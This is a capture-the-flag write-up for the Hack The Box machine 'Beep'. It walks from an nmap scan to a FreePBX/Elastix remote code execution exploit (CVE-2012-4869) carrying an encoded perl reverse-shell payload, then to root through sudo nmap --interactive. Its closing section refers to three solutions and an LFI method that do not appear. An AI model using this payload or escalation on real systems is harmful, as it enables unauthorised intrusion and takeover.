Beep Writeup

Beep is a linux based htb machine having a very large list of running services. The machine can be a little overwhelming for some as there are many potential attack vectors.

Vulnerability Exploited: FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Executio (CVE-2012-4869)

System Vulnerable: 10.10.10.7

Vulnerability Explanation: The callme_startcall function in recordings/misc/callme_page.php in FreePBX 2.9, 2.10, and earlier allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.

Vulnerability Fix: Applying the patch Unofficial Patch is able to eliminate this problem. The bugfix is ready for download at archives.neohapsis.com. A possible mitigation has been published before and not just after the disclosure of the vulnerability.

Privilege Escalation Vulnerability: Misconfiguring permissions can lead to disastrous consequences.

Vulnerability Fix: The developer should have conformed to the principle of least privilege and the concept of separation of privileges.

Severity: Critical

An initial nmap scan revealed the Apache version 2.2.3 running on port 80.

# Nmap 7.92 scan initiated Mon Dec 27 17:16:44 2021 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.13s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: STARTTLS OK Completed UIDPLUS ATOMIC LITERAL+ MAILBOX-REFERRALS IDLE THREAD=REFERENCES IMAP4 SORT LIST-SUBSCRIBED X-NETSCAPE ACL ID URLAUTHA0001 CATENATE ANNOTATEMORE UNSELECT LISTEXT NAMESPACE QUOTA SORT=MODSEQ THREAD=ORDEREDSUBJECT BINARY MULTIAPPEND CHILDREN RENAME RIGHTS=kxte CONDSTORE NO IMAP4rev1
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
|_ssl-date: 2021-12-27T23:18:02+00:00; +59m58s from scanner time.
880/tcp   open  unknown
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 59m57s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 27 17:21:27 2021 -- 1 IP address (1 host up) scanned in 283.74 seconds

The Elastic initial page

Searching for Elastic public exploits using searchsploit

https://www.exploit-db.com/exploits/18650

Download the exploit script from the following link: https://github.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/blob/master/exploit.py, then apply the needed changes as follow:

#exploit modified by infosecjunky
#https://infosecjunky.com

import urllib2
import ssl

rhost="10.10.10.7"
lhost="10.10.16.10"
lport=9001
extension="233"


ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

… SNIP …

Launch a nc listener on the local machine and execute the exploit

┌──(root💀kali)-[/root/htb/linux/beep]
└─# python exploit.py

Receiving a reverse shell as asterisk user

┌──(root💀kali)-[/root/htb/linux/beep]
└─# nc -nlvp 9001                                                                                                1 ⨯
listening on [any] 9001 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.7] 40929
whoami
asterisk

Spawn a shell using python

which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2$

user.txt

bash-3.2$ cat user.txt  && hostname && whoami && ip a
cat user.txt  && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
beep
asterisk
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:b9:f6:86 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.7/24 brd 10.10.10.255 scope global eth0

Run sudo -l command to determine what permissions the user asterisk had.

bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

The user asterisk can run nmap command without a password.

Run nmap on interactive mode and escalate to root privilege.

bash-3.2$ sudo nmap --interactive
sudo nmap –interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2#

root.txt

sh-3.2# cat root.txt  && hostname && whoami && ip a
cat root.txt  && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
beep
root
sh: ip: command not found
sh-3.2#

Lessons Learned
I presented three ways of rooting the machine. I know of at least two other way (not presented in this writeup) to root the machine including a neat solution by ippsec that involves sending a malicious email to a user of the machine and then executing that email using the LFI vulnerability we exploited in solution #2. I’m sure there are also many other ways that I didn’t think of.